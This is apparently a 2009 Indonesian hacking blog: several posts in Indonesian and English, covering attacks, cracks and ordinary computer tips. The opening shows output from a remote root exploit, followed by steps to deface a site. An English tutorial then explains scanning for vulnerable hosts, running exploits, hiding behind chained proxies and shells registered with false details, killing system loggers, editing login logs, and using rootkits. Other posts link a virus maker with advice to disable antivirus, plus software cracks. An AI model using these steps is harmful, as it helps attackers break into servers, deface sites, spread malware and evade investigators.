(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED #
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SEGV #
(7 ) binary-search: h: 0x083f9ffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083f9bfc, slider: 0x00000400 # SEGV #
(9 ) binary-search: h: 0x083f99fc, slider: 0x00000200 # SURVIVED #
(10) binary-search: h: 0x083f9afc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083f9a7c, slider: 0x00000080 # SEGV #
(12) binary-search: h: 0x083f9a3c, slider: 0x00000040 # SEGV #
(13) binary-search: h: 0x083f9a1c, slider: 0x00000020 # SEGV #
(14) binary-search: h: 0x083f9a0c, slider: 0x00000010 # SURVIVED #
(15) binary-search: h: 0x083f9a14, slider: 0x00000008 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083f9a14 # SURVIVED #
Exact match found at: 0x000065ec
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080865ec # SURVIVED #
Finding distance till stack buffer
(18) Trying: 0xb7f81400 # SEGV #
(19) Trying: 0xb7f81054 # SEGV #
(20) Trying: 0xb7f80ca8 # SEGV #
(21) Trying: 0xb7f808fc # SEGV #
(22) Trying: 0xb7f80550 # SEGV #
(23) Trying: 0xb7f801a4 # SEGV #
(24) Trying: 0xb7f7fdf8 # SEGV #
(25) Trying: 0xb7f7fa4c # SEGV #
(26) Trying: 0xb7f7f6a0 # SEGV #
(27) Trying: 0xb7f7f2f4 # SEGV #
(28) Trying: 0xb7f7ef48 # SEGV #
(29) Trying: 0xb7f7eb9c # SEGV #
(30) Trying: 0xb7f7e7f0 # SEGV #
(31) Trying: 0xb7f7e444 # SEGV #
(32) Trying: 0xb7f7e098 # SURVIVED # verifying
(33) Trying: 0xb7f7e098 # SEGV # OK
Finding exact h - stack_buf distance
(34) trying: 0xb7f7de98 slider: 0x0200# SURVIVED #
(35) trying: 0xb7f7dd98 slider: 0x0100# SURVIVED #
(36) trying: 0xb7f7dd18 slider: 0x0080# SEGV #
(37) trying: 0xb7f7dd58 slider: 0x0040# SEGV #
(38) trying: 0xb7f7dd78 slider: 0x0020# SURVIVED #
(39) trying: 0xb7f7dd68 slider: 0x0010# SEGV #
(40) trying: 0xb7f7dd70 slider: 0x0008# SEGV #
(41) trying: 0xb7f7dd74 slider: 0x0004# SURVIVED #
(42) trying: 0xb7f7dd72 slider: 0x0002# SEGV #
Final stack_dist: 0xb7f7dd74
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
No Crash, might have worked
Reply from remote: CHRIS CHRIS

***** YOU ARE IN *****

localhost.localdomain

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686
unknown

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

.....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...;)), gini caranya :

ganti dulu nama indexnyamv index.htm oldindex.htm

sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm

masukan HTML yang kalian buat di vi ataupun pico tadi

buka browser kalian....heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!

Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!!

How to deface a website

2009-07-30T04:18:00.000-07:00

First of all, I do not deface, I never have (besides friends sites as jokes and all in good fun), and never will. So how do I know how to deface? I guess I just picked it up on the way, so I am no expert in this. If I get a thing or two wrong I apoligize. It is pretty simple when you think that defacing is just replacing a file on a computer. Now, finding the exploit in the first place, that takes skill, that takes knowledge, that is what real hackers are made of. I don’t encourage that you deface any sites, as this can be used get credit cards, get passwords, get source code, billing info, email databases, etc.. (it is only right to put up some kind of warning. now go have fun

This tutorial will be broken down into 3 main sections, they are as followed:
1. Finding Vuln Hosts.
2. Getting In.
3. Covering Your Tracks

It really is easy, and I will show you how easy it is.

1. Finding Vuln Hosts
This section needs to be further broken down into two catigories of script kiddies: ones who scan the net for a host that is vuln to a certain exploit and ones who search a certain site for any exploit. The ones you see on alldas are the first kind, they scan thousands of sites for a specific exploit. They do not care who they hack, anyone will do. They have no set target and not much of a purpose. In my opinion these people should either have a cause behind what they are doing, ie. “I make sure people keep up to date with security, I am a messanger” or “I am spreading a political message, I use defacments to get media attention”. People who deface to get famous or to show off their skills need to grow up and relize there is a better way of going about this (not that I support the ones with other reasons ether). Anyways, the two kinds and what you need to know about them:

Scanning Script Kiddie: You need to know what signs of the hole are, is it a service? A certain OS? A CGI file? How can you tell if they are vuln? What version(s) are vuln? You need to know how to search the net to find targets which are running whatever is vuln. Use altavista.com or google.com for web based exploits. Using a script to scan ip ranges for a certain port that runs the vuln service. Or using netcraft.com to find out what kind of server they are running and what extras it runs (frontpage, php, etc..) nmap and other port scanners allow quick scans of thousands of ips for open ports. This is a favorate technique of those guys you see with mass hacks on alldas.

Targetted Site Script Kiddie: More respectable then the script kiddies who hack any old site. The main step here is gathering as much information about a site as possible. Find out what OS they run at netcraft or by using: telnet www.site.com 80 then GET / HTTP/1.1 Find out what services they run by doing a port scan. Find out the specifics on the services by telnetting to them. Find any cgi script, or other files which could allow access to the server if exploited by checking /cgi /cgi-bin and browsing around the site (remember to index browse)

Wasn’t so hard to get the info was it? It may take awhile, but go through the site slowly and get all the information you can.

2. Getting In
Now that we got the info on the site we can find the exploit(s) we can use to get access. If you were a scanning script kiddie you would know the exploit ahead of time. A couple of great places to look for exploits are Security Focus and packetstorm. Once you get the exploit check and make sure that the exploit is for the same version as the service, OS, script, etc.. Exploits mainly come in two languages, the most used are C and perl. Perl scripts will end in .pl or .cgi, while C will end in .c To compile a C file (on *nix systems) do gcc -o exploit12 file.c then: ./exploit12 For perl just do: chmod 700 file.pl (not really needed) then: perl file.pl. If it is not a script it might be a very simple exploit, or just a theory of a possible exploit. Just do alittle research into how to use it. Another thing you need to check is weither the exploit is remote or local. If it is local you must have an account or physical access to the computer. If it is remote you can do it over a network (internet).

Don’t go compiling exploits just yet, there is one more important thing you need to know

Covering Your Tracks
So by now you have gotten the info on the host inorder to find an exploit that will allow you to get access. So why not do it? The problem with covering your tracks isn’t that it is hard, rather that it is unpredictable. just because you killed the sys logging doesn’t mean that they don’t have another logger or IDS running somewhere else. (even on another box). Since most script kiddies don’t know the skill of the admin they are targetting they have no way of knowing if they have additional loggers or what. Instead the script kiddie makes it very hard (next to impossible) for the admin to track them down. Many use a stolden or second isp account to begin with, so even if they get tracked they won’t get caught. If you don’t have the luxery of this then you MUST use multiple wingates, shell accounts, or trojans to bounce off of. Linking them together will make it very hard for someone to track you down. Logs on the wingates and shells will most likely be erased after like 2-7 days. That is if logs are kept at all. It is hard enough to even get ahold of one admin in a week, let alone further tracking the script kiddie down to the next wingate or shell and then getting ahold of that admin all before the logs of any are erased. And it is rare for an admin to even notice an attack, even a smaller percent will actively pursue the attacker at all and will just secure their box and forget it ever happend. For the sake of arugment lets just say if you use wingates and shells, don’t do anything to piss the admin off too much (which will get them to call authoritizes or try to track you down) and you deleting logs you will be safe. So how do you do it?

We will keep this very short and too the point, so we’ll need to get a few wingates. Wingates by nature tend to change IPs or shutdown all the time, so you need an updated list or program to scan the net for them. You can get a list of wingates that is well updated at http://www.cyberarmy.com/lists/wingate/ and you can also get a program called winscan there. Now lets say we have 3 wingates:

212.96.195.33 port 23
202.134.244.215 port 1080
203.87.131.9 port 23

to use them we go to telnet and connect to them on port 23. we should get a responce like this:

CSM Proxy Server >

to connect to the next wingate we just type in it’s ip:port

CSM Proxy Server >202.134.244.215:1080
If you get an error it is most likely to be that the proxy you are trying to connect to isn’t up, or that you need to login to the proxy. If all goes well you will get the 3 chained together and have a shell account you are able to connect to. Once you are in your shell account you can link shells together by:

E-mail j00]$ ssh 212.23.53.74

You can get free shells to work with until you get some hacked shells, here is a list of free shell accounts. And please remember to sign up with false information and from a wingate if possible.

SDF (freeshell.org) – http://sdf.lonestar.org
GREX (cyberspace.org) – http://www.grex.org
NYX – http://www.nxy.net
ShellYeah – http://www.shellyeah.org
HOBBITON.org – http://www.hobbiton.org
FreeShells – http://www.freeshells.net
DucTape – http://www.ductape.net
Free.Net.Pl (Polish server) – http://www.free.net.pl
XOX.pl (Polish server) – http://www.xox.pl
IProtection – http://www.iprotection.com
CORONUS – http://www.coronus.com
ODD.org – http://www.odd.org
MARMOSET – http://www.marmoset.net
flame.org – http://www.flame.org
freeshells – http://freeshells.net.pk
LinuxShell – http://www.linuxshell.org
takiweb – http://www.takiweb.com
FreePort – http://freeport.xenos.net
BSDSHELL – http://free.bsdshell.net
ROOTshell.be – http://www.rootshell.be
shellasylum.com – http://www.shellasylum.com
Daforest – http://www.daforest.org
FreedomShell.com – http://www.freedomshell.com
LuxAdmin – http://www.luxadmin.org
shellweb – http://shellweb.net
blekko – http://blekko.net

once you get on your last shell you can compile the exploit, and you should be safe from being tracked. But lets be even more sure and delete the evidence that we were there.

Alright, there are a few things on the server side that all script kiddies need to be aware of. Mostly these are logs that you must delete or edit. The real script kiddies might even use a rootkit to automaticly delete the logs. Although lets assume you aren’t that lame. There are two main logging daemons which I will cover, klogd which is the kernel logs, and syslogd which is the system logs. First step is to kill the daemons so they don’t log anymore of your actions.

E-mail root]# ps -def | grep syslogd
E-mail root]# kill -9 pid_of_syslogd

in the first line we are finding the pid of the syslogd, in the second we are killing the daemon. You can also use /etc/syslog.pid to find the pid of syslogd.

E-mail root]# ps -def | grep klogd
E-mail root]# kill -9 pid_of_klogd

Same thing happening here with klogd as we did with syslogd.

now that killed the default loggers the script kiddie needs to delete themself from the logs. To find where syslogd puts it’s logs check the /etc/syslog.conf file. Of course if you don’t care if the admin knows you were there you can delete the logs completely. Lets say you are the lamest of the script kiddies, a defacer, the admin would know that the box has been comprimised since the website was defaced. So there is no point in appending the logs, they would just delete them. The reason we are appending them is so that the admin will not even know a break in has accurd. I’ll go over the main reasons people break into a box:

To deface the website. – this is really lame, since it has no point and just damages the system.

To sniff for other network passwords. – there are programs which allow you to sniff other passwords sent from and to the box. If this box is on an ethernet network then you can even sniff packets (which contain passwords) that are destine to any box in that segment.

To mount a DDoS attack. – another lame reason, the admin has a high chance of noticing that you comprimised him once you start sending hundreds of MBs through his connection.

To mount another attack on a box. – this and sniffing is the most commonly used, not lame, reason for exploiting something. Since you now how a rootshell you can mount your attack from this box instead of those crappy freeshells. And you now have control over the logging of the shell.

To get sensitive info. – some corperate boxes have alot of valueable info on them. Credit card databases, source code for software, user/password lists, and other top secret info that a hacker may want to have.

To learn and have fun. – many people do it for the thrill of hacking, and the knowledge you gain. I don’t see this as horrible a crime as defacing. as long as you don’t destroy anything I don’t think this is very bad. Infact some people will even help the admin patch the hole. Still illegal though, and best not to break into anyone’s box.

I’ll go over the basic log files: utmp, wtmp, lastlog, and .bash_history
These files are usually in /var/log/ but I have heard of them being in /etc/ /usr/bin/ and other places. Since it is different on alot of boxes it is best to just do a find / -iname ‘utmp’|find / -iname ‘wtmp’|find / -iname ‘lastlog’. and also search threw the /usr/ /var/ and /etc/ directories for other logs. Now for the explanation of these 3.

utmp is the log file for who is on the system, I think you can see why this log should be appended. Because you do not want to let anyone know you are in the system. wtmp logs the logins and logouts as well as other info you want to keep away from the admin. Should be appended to show that you never logged in or out. and lastlog is a file which keeps records of all logins. Your shell’s history is another file that keeps a log of all the commands you issued, you should look for it in your $ HOME directory and edit it, .sh_history, .history, and .bash_history are the common names. you should only append these log files, not delete them. if you delete them it will be like holding a big sign infront of the admin saying “You’ve been hacked”. Newbie script kiddies often deface and then rm -rf / to be safe. I would avoid this unless you are really freaking out. In this case I would suggest that you never try to exploit a box again. Another way to find log files is to run a script to check for open files (and then manually look at them to determine if they are logs) or do a find for files which have been editted, this command would be: find / -ctime 0 -print

A few popular scripts which can hide your presence from logs include: zap, clear and cloak. Zap will replace your presence in the logs with 0’s, clear will clear the logs of your presence, and cloak will replace your presence with different information. acct-cleaner is the only heavily used script in deleting account logging from my experience. Most rootkits have a log cleaning script, and once you installed it logs are not kept of you anyways. If you are on NT the logs are at C:winNTsystem32LogFiles, just delete them, nt admins most likely don’t check them or don’t know what it means if they are deleted.

One final thing about covering your tracks, I won’t go to into detail about this because it would require a tutorial all to itself. I am talking about rootkits. What are rootkits? They are a very widely used tool used to cover your tracks once you get into a box. They will make staying hidden painfree and very easy. What they do is replace the binaries like login, ps, and who to not show your presence, ever. They will allow you to login without a password, without being logged by wtmp or lastlog and without even being in the /etc/passwd file. They also make commands like ps not show your processes, so no one knows what programs you are running. They send out fake reports on netstat, ls, and w so that everything looks the way it normally would, except anything you do is missing. But there are some flaws in rootkits, for one some commands produce strange effects because the binary was not made correctly. They also leave cenzurat (ways to tell that the file is from a rootkit). Only smart/good admins check for rootkits, so this isn’t the biggest threat, but it should be concidered. Rootkits that come with a LKM (loadable kernel module) are usually the best as they can pretty much make you totally invisible to all others and most admins wouldn’t be able to tell they were comprimised.

In writting this tutorial I have mixed feelings. I do not want more script kiddies out their scanning hundreds of sites for the next exploit. And I don’t want my name on any shouts. I rather would like to have people say “mmm, that defacing crap is pretty lame” especially when people with no lives scan for exploits everyday just to get their name on a site for a few minutes. I feel alot of people are learning everything but what they need to know inorder to break into boxes. Maybe this tutorial cut to the chase alittle and helps people with some knowledge see how simple it is and hopefully make them see that getting into a system is not all it’s hyped up to be. It is not by any means a full guide, I did not cover alot of things. I hope admins found this tutorial helpful aswell, learning that no matter what site you run you should always keep on top of the latest exploits and patch them. Protect yourself with IDS and try finding holes on your own system (both with vuln scanners and by hand). Also setting up an external box to log is not a bad idea. Admins should have also seen alittle bit into the mind of a script kiddie and learned a few things he does.. this should help you catch one if they break into your systems.

On one final note, defacing is lame. I know many people who have defaced in the past and regret it now. You will be labeled a script kiddie and a lamer for a long, long time.

Download Kim Ki Bum Facebook Layouts

2009-07-30T04:05:00.000-07:00

Setelah kemaren tips facebook membahas tentang cara menghilangkan iklan di facebook,kali ini tips facebook datang lagi dengan akan mencoba hal yang baru yaitu tips facebook akan membagikan layouts facebook yang bertemakan tentang artis korea yaitu Kim Ki Bum.Pasti facebookholic akan suka dengan layouts ini apalagi facebookholic adalah seorang cewe yang biasanya suka banget sama artis korea apalagi yang lagi trend sekarang Kim Ki Bum.Oyha yang pastinya layouts ini gratis tis tiz.hehehe
Langsung saja liat nih screnshoutnya di bawah ini

Gimana..keren kan layouts nya.
Adapun cara memasang layouts lumayan gampang,namun ada beberapa syarat yang kamu harus penuhi.Syarat apakah itu?

SYARAT:

1. Anda harus memiliki PC / Laptop sendiri,maksudnya jangan main diwarnet atau pinjam tempat teman

2. Jangan gunakan Deep Freeze di komputer kamu

2. Browser yang digunakan yaitu Mozilla Firefox.

3. Sudah terinstal addons stylish di firefox anda.Kalu belum terinstal silahkan klik disini

4. Download kode CSS berikut ini : http://h1.ripway.com/zentro/kim-ki-bum.css.txt

CARA MEMASANGNYA

1.Kopi semua kode css yang sudah kamu download tadi

2.Klik icon addons stylish yang ada di bagian pojok kanan bawah yang gambarnya mirip Lambang DOLLAR / huruf "S".hehe

3.Klik kanan icon stylish,kemudian pilih Write New Style,kemudian pilih Blank Style

4.Pastekan kode css tadi di kolom tersebut,kemudian isikan nama layouts tersebut,nama layouts terserah kamu

5.Yang terakhir klik save

Gimana...?layouts facebook dengan tema Kim Ki Bum nya,keren kan?heheh
Semoga dapat bermanfaat dan selamat mencoba
SALAM

TIPS FACEBOOK

sumber :http://yoyok198.blogspot.com/

crack or serial namber

2009-07-28T00:11:00.000-07:00

ni adalah link buat crack serial namber kebetulan qw menemukannya di forum.hacker-center

semoga bermanfaat bagi anda!!!!

DOWNLOAD

make a virus

2009-07-27T02:26:00.000-07:00

Hye....gunakn tools ini utk buat simple virus..

Versi Pertama
http://downtown.vc/index.php?page=main&id=17498418&name=Virus Maker v02.rar

Versi Kedua
http://downtown.vc/index.php?page=main&id=d7de4541&name=Virus Maker V2.rar

*jngan lupa Pastikan DISABLE antivirus anda..enjoy..

Cara menghapus virus di FD

2009-07-27T02:14:00.000-07:00

Cara menghapus virus di FD

Biasanya virus pada FD mengeksekusi / menjalankan perintahnya melalui “autorun.inf”

untuk itu, sebelum membuka flashdisk anda sebaiknya melalui address pada toolbar XP...

Setelah itu....

Buka notepad...

ketikan source code berikut..

[autorun]

icon="nama icon.ico"

setelah itu save pada desktop dg nama "autorun.inf"

>>>Kalo ga ada icon save aja tanpa mengetikan apa2 dengan nama yang sama<<<

Setelah itu download software Ansav_pe_beta….Di sini…

http://rapidshare.com/files/72395289/ansav_pe_beta.zip.html
[15 hari dari tgl 26]

or

http://gudangupload.com/filelink.php?filecode=f4009af44ae062fbc31e5035cdd7dc3b
[90 hari dari tgl 27 Nov]

Nah kalo uda…[kecil kq]Knapa ansav_pe_beta???

*Karena ansav yang satu ini punya tool menarik....Liat aj d ntar....

Ikutin cara2 ini…

First…extract dulu ansav_pe_beta tadi…

Kedua, buka “AN^SAV~32.EXE”

Ketiga, klik tool pada “AN^SAV~32.EXE” tadi

Keempat, tunjukkan dimana file virus yang anda prediksi, atau file “.exe” yang masuk tanpa sepengetahuan anda….

Kelima Scan FD anda….

Setelah itu Hapus virus, dengan menggunakan clean

Terakhir….Cabut FD….N colok lagi…

Mudah2an thu virus K.O

Nah...Kalo maw lbi lengkap download filenya disini...

http://rapidshare.com/files/72399868/Cara_menghapus_virus_di_FD.zip.html
[15 hari dari tgl 26 Nov]

or

http://gudangupload.com/filelink.php?filecode=eec2df752f0c2f75b815672bc350f0ae
[90 hari dari tgl 27 Nov]

Selamat Berjuang....

post Crack Windows XP

2009-07-27T01:21:00.000-07:00

Windows XP palsu menjadi asli?? Kedengarannya mustahil, tapi itu memang benar bisa dilakukan. Dengan HCCRKWXP windows XP palsu bisa menjadi asli (Menikmati fitur microsoft).

Download.

tips Menghapus Cache Telkomsel Flash

2009-07-26T00:11:00.000-07:00

Postingan ini mungkin khusus ditujukan untuk anda pengguna Telkomsel Flash sebagai koneksi internet. Ditempat kang Rohman, Sinyal telkomsel flash lebih bagus di banding dengan Indosat, oleh karena itu sampai saat ini kang Rohman masih pelanggan setia telkomsel flash. namun ada satu kekurangan telkomsel flash yang sedikit menjengkelkan yaitu sering menampilkan halaman lama atau istilahnya cache kali yeh. oleh karena pada postingan ini kang Rohman akan memberikan tips menghapus Cache Telkomsel flash.

Terkadang ketika browsing, halaman yang di tampilkan adalah halaman yang terbilang lama, mungkin halaman kemaren atau beberapa hari yang lalu atau juga minggu yang lalu, ini dapat di yakinkan ketika kang Rohman posting artikel baru akan tetapi ketika di lihat posting tersebut tidak tampil seakan-akan belum ada postingan baru. Atau yang lebih parah lagi adalah apabila mengganti template, ketika dilihat template yang muncul adalah template yang lama seakan-akan belum di ganti templatenya. Masalah ini timbul bukanlah dari komputer kita atau browser yang di pakai, karena walaupun berganti-ganti browser hasilnya tetap saja.

Bagaimana untuk mengatasi masalah ini? caranya cukup sederhana, anda tinggal klik dua tombol pada keybord anda secara bersamaan. Tombol tersebut adalah tombol :

Ctrl dan F5 ( Ctrl + F5 )

Langkah sederhana tersebut selama ini cukup ampuh untuk menghapus cache telkomsel yang sangat menjengkelkan.

Selamat mencoba!

sumber: kang rohman
website : http://kolom-tutorial.blogspot.com/

Membuat foto animasi

2009-07-25T23:51:00.001-07:00

Lagi-lagi saya berbicara tentang animasi, memang dengan animasi bisa bikin hidup jadi hidup ( kaya iklan aja ). Ya dalam kesempatan kali ini akan coba di bahas tentang bagaimana cara membuat animasi gambar ataupun foto. Bagi para sobat (mulai sekarang saya akan membiasakan diri menyebut anda menjadi sobat, biar lebih familier ya) yang sudah terbiasa menggunakan program animasi semisal MacroMedia Flash Player ataupun teman-temannya sudah barang tentu bukan hal yang wah ataupun aneh, tapi bagi sekelompok orang seperti saya ini, membuat animasi foto adalah suatu hal yang sangat sulit sekali.

Adakah diantara para sobat blogger yang seperti saya? jika jawabannya ada ya kita emang senasib (hiduplah senasib), tapi jangan dulu patah semangat sobat blogger, pepatah bilang banyak jalan menuju rhoma (irama).. dalam hal inipun sama ada jalannya yakni kita bisa menggunakan jasa situs-situs pembuat animasi. Di internet buaanyak sekali situs pembuat animasi foto, jumlahnya ribuan atau bahkan jutaan. Nah sebagai contoh yaitu http://www.slide.com. Untuk membuat sebuah foto animasi di slide.com, silahkan ikuti langkah-langkah berikut :

Silahkan buka situs www.slide.com

Langkah pertama yaitu sobat harus daftar dahulu pada situs tersebut

Klik tulisan Sign Up untuk melakukan pendaftaran (daftar gratis)

Masukan alamat email sobat pada kolom yang disediakan. isi juga password yang diinginkan

Jika sudah, silahkan klik tombol sign Up, dan otomatis sobat sudah masuk ke halaman account sobat

Langkah selanjutnya adalah melakukan pembuatan animasi

Klik style, untuk memilih gaya dari animasi

klik skin, untuk memilih bingkai animasi

klik Size untuk memilih ukuran

Klik Tombol Select Image, lalu masukan foto/image yang ingin sobat masukan

klik tombol Upload untuk melakukan proses upload foto

Jika proses upload selesai, klik tombolSave

Copy kode HTML yang di berikan, lalu paste pada program notepad

Klik tulisan Log Out untuk keluar dari situs tersebut. Silahkan tutup halaman browser

Langkah selanjutnya adalah memasukan kode HTML animasi tersebut ke dalam blog sobat, nah untuk cara memasukan kode HTML sudah sering saya bahas pada postingan terdahulu, jika lupa silahkan klik di sini

Firewall: Security Internet

2009-07-18T00:03:00.001-07:00

Internet merupakan sebuah jaringan komputer yang sangat terbuka di dunia, konsekuensi yang harus di tanggung adalah tidak ada jaminan keamanan bagi jaringan yang terkait ke Internet. Artinya jika operator jaringan tidak hati-hati dalam menset-up sistemnya, maka kemungkinan besar jaringan yang terkait ke Internet akan dengan mudah dimasuki orang yang tidak di undang dari luar. Adalah tugas dari operator jaringan yang bersangkutan, untuk menekan resiko tersebut seminimal mungkin. Pemilihan strategi dan kecakapan administrator jaringan ini, akan sangat membedakan apakah suatu jaringan mudah ditembus atau tidak.

Firewall merupakan alat untuk mengimplementasikan kebijakan security (security policy). Sedangkan kebijakan security, dibuat berdasarkan perimbangan antara fasilitas yang disediakan dengan implikasi security-nya. Semakin ketat kebijakan security, semakin kompleks konfigurasi layanan informasi atau semakin sedikit fasilitas yang tersedia di jaringan. Sebaliknya, dengan semakin banyak fasilitas yang tersedia atau sedemikian sederhananya konfigurasi yang diterapkan, maka semakin mudah orang orang ‘usil’ dari luar masuk kedalam sistem (akibat langsung dari lemahnya kebijakan security).

Tulisan ini akan mencoba melihat beberapa kebijakan sekuriti yang lazim digunakan pada saat mengkaitkan sebuah jaringan ke Internet.

Firewall

Firewall adalah istilah yang biasa digunakan untuk menunjuk pada suatu komponen atau sekumpulan komponen jaringan, yang berfungsi membatasi akses antara dua jaringan, lebih khusus lagi, antara jaringan internal dengan jaringan global Internet. Firewall mempunyai beberapa tugas :

Pertama dan yang terpenting adalah: harus dapat mengimplementasikan kebijakan security di jaringan (site security policy). Jika aksi tertentu tidak diperbolehkan oleh kebijakan ini, maka firewall harus meyakinkan bahwa semua usaha yang mewakili operasi tersebut harus gagal atau digagalkan. Dengan demikian, semua akses ilegal antar jaringan (tidak diotorisasikan) akan ditolak.
Melakukan filtering: mewajibkan semua traffik yang ada untuk dilewatkan melalui firewall bagi semua proses pemberian dan pemanfaatan layanan informasi. Dalam konteks ini, aliran paket data dari/menuju firewall, diseleksi berdasarkan IP-address, nomor port, atau arahnya, dan disesuaikan dengan kebijakan security.
Firewall juga harus dapat merekam/mencatat even-even mencurigakan serta memberitahu administrator terhadap segala usaha-usaha menembus kebijakan security.

Merencanakan Jaringan Dengan Firewall

Merencanakan sistem firewall pada jaringan, berkaitan erat dengan jenis fasilitas apa yang akan disediakan bagi para pemakai, sejauh mana level resiko-security yang bisa diterima, serta berapa banyak waktu, biaya dan keahlian yang tersedia (faktor teknis dan ekonomis). Firewall umumnya terdiri dari bagian filter (disebut juga screen atau choke) dan bagian gateway (gate). Filter berfungsi untuk membatasi akses, mempersempit kanal, atau untuk memblok kelas trafik tertentu. Terjadinya pembatasan akses, berarti akan mengurangi fungsi jaringan. Untuk tetap menjaga fungsi komunikasi jaringan dalam lingkungan yang ber-firewall, umumnya ditempuh dua cara :

Pertama, bila kita bayangkan jaringan kita berada dalam perlindungan sebuah benteng, komunikasi dapat terjadi melalui pintu-pintu keluar benteng tersebut. Cara ini dikenal sebagai packet-filtering, dimana filter hanya digunakan untuk menolak trafik pada kanal yang tidak digunakan atau kanal dengan resiko-security cukup besar, sedangkan trafik pada kanal yang lain masih tetap diperbolehkan.
Cara kedua, menggunakan sistem proxy, dimana setiap komunikasi yang terjadi antar kedua jaringan harus dilakukan melalui suatu operator, dalam hal ini proxy server. Beberapa protokol, seperti telnet dan SMTP(Simple Mail Transport Protocol), akan lebih efektif ditangani dengan evaluasi paket (packet filtering), sedangkan yang lain seperti FTP (File Transport Protocol), Archie, Gopher dan HTTP (Hyper-Text Transport Protocol) akan lebih efektif ditangani dengan sistem proxy. Kebanyakan firewall menggunakan kombinasi kedua teknik ini (packet filtering dan proxy).

Ada banyak literatur yang membahas masalah security & membagi arsitektur dasar firewall menjadi tiga jenis. Masing masing adalah:

arsitektur dengan dual-homed host (kadang kadang dikenal juga sebagai dual homed gateway/ DHG)
screened-host (screened host gateway/ SHG) · screened subnet (screened subnet gateway/ SSG).

Sistem DHG menggunakan sebuah komputer dengan (paling sedikit) dua network-interface. Interface pertama dihubungkan dengan jaringan internal dan yang lainnya dengan Internet. Dual-homed host nya sendiri berfungsi sebagai bastion host (front terdepan, bagian terpenting dalam firewall).

Pada topologi SHG, fungsi firewall dilakukan oleh sebuah screening-router dan bastion host. Router ini dikonfigurasi sedemikian sehingga akan menolak semua trafik kecuali yang ditujukan ke bastion host, sedangkan pada trafik internal tidak dilakukan pembatasan. Dengan cara ini setiap client servis pada jaringan internal dapat menggunakan fasilitas komunikasi standard dengan Internet tanpa harus melalui proxy.

Firewall dengan arsitektur screened-subnet menggunakan dua screening-router dan jaringan tengah (perimeter network) antara kedua router tersebut, dimana ditempatkan bastion host. Kelebihan susunan ini akan terlihat pada waktu optimasi penempatan server.

Selanjutnya, bagaimana relevansi arsitektur firewall tersebut terhadap level security? Suatu jaringan harus dapat menangani interaksi client-server, tidak terkecuali dengan kehadiran firewall. Sejauh ini, untuk operasi client internal - server internal, atau client internal - server eksternal, tidak terlalu menimbulkan masalah. Jika kita akan membuat sistem firewall untuk jaringan demikian, hanya dengan memasang proxy server pada bastion host dalam arsitektur yang dipilih, kualitas proteksi firewall yang bersangkutan akan maksimal. Artinya ‘keselamatan’ seluruh jaringan, sekarang hanya tergantung pada baik-tidaknya atau seberapa ‘bagus’ firewall tersebut dan tidak tergantung pada program-program yang lain. Beda halnya bila jaringan kita akan mendukung operasi client eksternal - server internal, atau dengan kata lain : jaringan internal kita menyediakan layanan informasi yang dapat diakses dari luar. Dalam konteks ini, harus diperhitungkan metoda penempatan mesin yang menjalankan program server, supaya mesin tersebut dapat dikenali dari internet dan sedemikian, komunikasi dengan client-nya dapat berlangsung dengan baik tanpa mengorbankan kepentingan security.

Arsitektur dual-homed menawarkan solusi sederhana dan murah. Satu-satunya mesin yang dikenal dari internet dalam sistem ini adalah dual-homed host-nya sendiri, dan dengan demikian ia menjadi satu-satunya mesin alternatif untuk menjalankan program server. Tetapi akan bermanfaat untuk mengingat, bahwa semakin banyak layanan yang disediakan atau semakin banyak program yang berjalan pada bastion-host, maka peluang penyusupan ke komputer tersebut semakin besar. Karena, seperti diyakini banyak orang, hampir dipastikan tidak ada program apapun yang bebas sama sekali dari bugs, apalagi untuk program-program berukuran besar. Dan sekali bugs ini dapat dieksploitasi oleh seseorang yang kemudian masuk ke dalam bastion-host, maka seluruh komputer di jaringan kita akan menjadi terbuka! Jika faktor ekonomis memaksa kita untuk tetap mengimplementasikan arsitektur DHG, maka ada beberapa nasihat yang patut diperhatikan, diantaranya: menggunakan perangkat lunak server yang telah teruji relatif ‘aman’ serta berukuran kecil, mereduksi dan mengoptimasi jumlah program yang berjalan, kemudian tidak memberikan account reguler pada bastion-host.

